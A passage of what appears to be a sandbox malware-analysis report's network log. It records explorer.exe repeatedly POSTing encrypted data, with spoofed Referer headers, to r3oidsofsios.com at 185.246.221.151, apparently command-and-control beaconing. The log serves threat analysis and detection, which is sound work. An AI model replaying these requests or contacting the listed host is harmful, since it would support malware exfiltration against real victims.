                          Nov 30, 2022 00:12:38.187999964 CET | 325                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 82 02 1f d3 26 f2 fe 75 ce 16 18 26
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u&v 7~dPpGd&_zNDe1-?JB]VaZn*?eKO3(
                          Nov 30, 2022 00:12:38.306819916 CET | 326                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          23         | 192.168.2.7 | 49738       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:38.389544964 CET | 327                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://jvjyarecuw.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 298
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:38.389569998 CET | 327                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 81 02 1f d3 26 f2 fe 75 d3 71 2b 3e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uq+>^Y>P+tWsTy)~7UE~ExcQK;QX}f*6?B%:K%Vm`<p20Y@CK0:y"F5`n&.[&^U}%#(fF
                          Nov 30, 2022 00:12:38.503267050 CET | 328                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          24         | 192.168.2.7 | 49739       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:38.844290018 CET | 329                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hrxqxa.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 253
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:38.844290018 CET | 329                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 80 02 1f d3 26 f2 fe 75 cb 61 24 0d
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ua$/8R;5}w(_vhbU(%L"@X |)*b5$ws&hB#*)Y(t+Ik&N\ys/+FpideY.
                          Nov 30, 2022 00:12:38.964234114 CET | 330                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          25         | 192.168.2.7 | 49740       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:39.079370022 CET | 331                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://uwoxt.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 363
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:39.079370022 CET | 331                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8f 02 1f d3 26 f2 fe 75 bf 7f 1b 44
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uDQWAAH~"zU-w7Z^F]HFrTJH*bsk\sQUA2[jd7sQ|`#'VSU?bEWd2*L-DXV0g@;1q,F6
                          Nov 30, 2022 00:12:39.204178095 CET | 332                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:39 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          26         | 192.168.2.7 | 49741       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:39.321549892 CET | 333                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://bqruytosp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 285
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:39.321588993 CET | 333                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8e 02 1f d3 26 f2 fe 75 d2 12 0f 4e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uN|O&SVD?@7^6 7>W^2R.^x"{[Fa#4%O]K_OX_Vpr`q]'"#=>;UxV];~w/BY4,tkpOwV
                          Nov 30, 2022 00:12:39.438452959 CET | 334                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:39 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          27         | 192.168.2.7 | 49742       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:40.168219090 CET | 334                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://lclth.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 257
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:40.168253899 CET | 335                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8d 02 1f d3 26 f2 fe 75 ad 17 2e 09
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u.^j|&)Rc5WiP#lGW1h)64|Kf2#+P^}d4+oVeA$$LNSkqe_>W/%&B==]]d8unF8G@Dn$l/Bz
                          Nov 30, 2022 00:12:40.297549009 CET | 335                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:40 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          28         | 192.168.2.7 | 49743       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:40.415658951 CET | 336                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vreqndf.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 261
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:40.415714025 CET | 337                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 8c 02 1f d3 26 f2 fe 75 d7 69 2e 57
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ui.WN|<:)&s9[(5BU[D^X,j')4Z psd3!sl4-(q*6a2w.kdG_[TP![+W_rwZ-*R~xE$ix,w:+ A
                          Nov 30, 2022 00:12:40.529710054 CET | 337                | IN        | HTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:40 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          3          | 192.168.2.7 | 49718       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:33.241688967 CET | 296                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hraesy.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 179
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:33.241713047 CET | 296                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 95 02 1f d3 26 f2 fe 75 ae 44 49 0e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uDI,%j"X`]aQD\`fjc/+0$h-MUz>!4?p-nUmV{tN
                          Nov 30, 2022 00:12:33.362689018 CET | 296                | IN        | HTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          4          | 192.168.2.7 | 49719       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:33.879952908 CET | 297                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vqnwxa.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 307
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:33.882788897 CET | 298                | OUT       | Data Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 94 02 1f d3 26 f2 fe 75 f7 5f 43 3a
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u_C:.h(If/Z@~<ZhCtI}?uhj^o$1XiE;XHYG*cqtKWQZNK"19{wq:4tnZ90Lbw't@\
                          Nov 30, 2022 00:12:34.002124071 CET | 298                | IN        | HTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session ID | Source IP   | Source Port | Destination IP  | Destination Port | Process
                          5          | 192.168.2.7 | 49720       | 185.246.221.151 | 80               | C:\Windows\explorer.exe
                          Timestamp                           | kBytes transferred | Direction | Data
                          Nov 30, 2022 00:12:34.067845106 CET | 299                | OUT       | POST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://sqyiaue.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 288
                          Host: r3oidsofsios.com
